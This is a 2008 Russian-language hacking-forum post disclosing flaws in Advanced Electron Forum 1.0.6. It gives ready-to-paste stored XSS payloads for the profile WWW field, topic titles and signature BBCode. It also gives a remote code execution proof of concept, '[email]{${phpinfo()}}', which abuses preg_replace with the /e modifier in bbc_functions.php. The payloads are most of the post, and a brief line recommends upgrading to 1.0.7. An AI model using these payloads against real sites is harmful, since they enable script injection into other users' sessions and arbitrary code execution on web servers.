Показать сообщение отдельно

  #38  
Старый 09.09.2008, 15:54
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами: 10263663

Репутация: 1559


По умолчанию

Форум: Advanced Electron Forum(AEF)
Версия: 1.0.6

Активные XSS

1 активная

Заходим в профиль уявимое поле WWW: вводим
Код:
"><script>alert('xss')</script>
2 активная

Создаём тему в названии темы вводим
Код:
"><script>alert('xss')</script>
3 активная

В подписи вводим:

Код:
[UR*L]http://" onmouseover="alert('xss');"[/URL]
[IM*G]http://" onmouseover="alert('xss');"[/IMG]
Поиск: Powered By AEF 1.0.6 © 2008 Electron Inc.

Скачать форум: http://www.anelectron.com/download.php

(c) ~!Dok_tOR!~



UPDATE

Advanced Electron Forum <= 1.0.6 Remote Code Execution

Сценарий /main/functions/bbc_functions.php

Уязвимый код:

PHP код:
    //Email Links
    
if($globals['bbc_email']){
    
        
$text preg_replace(
                    array(
"/\[email=(.*?)\](.*?)\[\/email\]/ies",
                            
"/\[email\](.*?)\[\/email\]/ies"),
                    array(
'check_email("$1", "$2")',
                            
'check_email("$1", "$1")'), $text);
    
    }
[/
email


Уязвимость существует из-за небезопасного вызова функции "preg_replace()" с параметром "e". Удаленный пользователь может с помощью специально сформированного тега выполнить произвольный PHP код на целевой системе с привилегиям Web сервера.

Пример:

Код:
[*email]{${phpinfo()}}
* - убрать конечно.

Решение: Установите последнюю версию 1.0.7 с сайта производителя.

Original link

Последний раз редактировалось ~!DoK_tOR!~; 04.10.2008 в 22:46..
 
Ответить с цитированием